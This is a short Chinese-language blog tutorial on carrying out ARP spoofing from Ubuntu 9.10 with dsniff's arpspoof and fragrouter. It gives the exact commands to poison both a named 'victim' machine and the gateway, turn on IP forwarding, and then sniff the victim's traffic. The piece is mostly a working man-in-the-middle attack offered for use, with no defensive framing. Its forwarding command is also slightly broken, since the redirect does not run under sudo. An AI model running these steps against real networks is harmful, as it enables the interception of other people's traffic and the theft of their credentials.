Ubuntu进行ARP欺骗

注意：本文最后更新于 2741 天前，有关的内容可能已经发生变化，请参考使用。

假设系统是ubuntu 9.10，网络情况：路由ip：172.16.86.254 我的电脑ip：172.16.86.2 受害者ip：172.16.86.3

主要用到的工具有2个，一个是Dsniff，还有一个是 fragrouter。

安装Dsniff

    sudo apt-get install dsniff

在/etc/apt/sources.list 文件中添加源:

deb http://cz.archive.ubuntu.com/ubuntu hardy main universe

再执行

    sudo apt-get install fragrouter

欺骗172.16.86.3，告诉172.16.86.3，网关172.16.86.254的MAC地址是本机的MAC地址：

    sudo arpspoof -t 172.16.86.3 172.16.86.254

欺骗网关，告诉网关，172.16.86.3的MAC地址是本机的MAC地址：

    sudo arpspoof -t 172.16.86.254 172.16.86.3

ARP数据包广播之后，网关和受害机之间的数据交流就都需要经过我的机器了

设置转发,让受害机与网关的通信正常：

    $ sudo echo 1 >/proc/sys/net/ipv4/ip_forward
    $ fragrouter -B1

接下来就可以嗅探数据咯，还不会用Dsniff的TX去网上搜索一些资料看看，或者转用WireShark的GUI工具抓包……

「倘若有所帮助，不妨酌情赞赏!」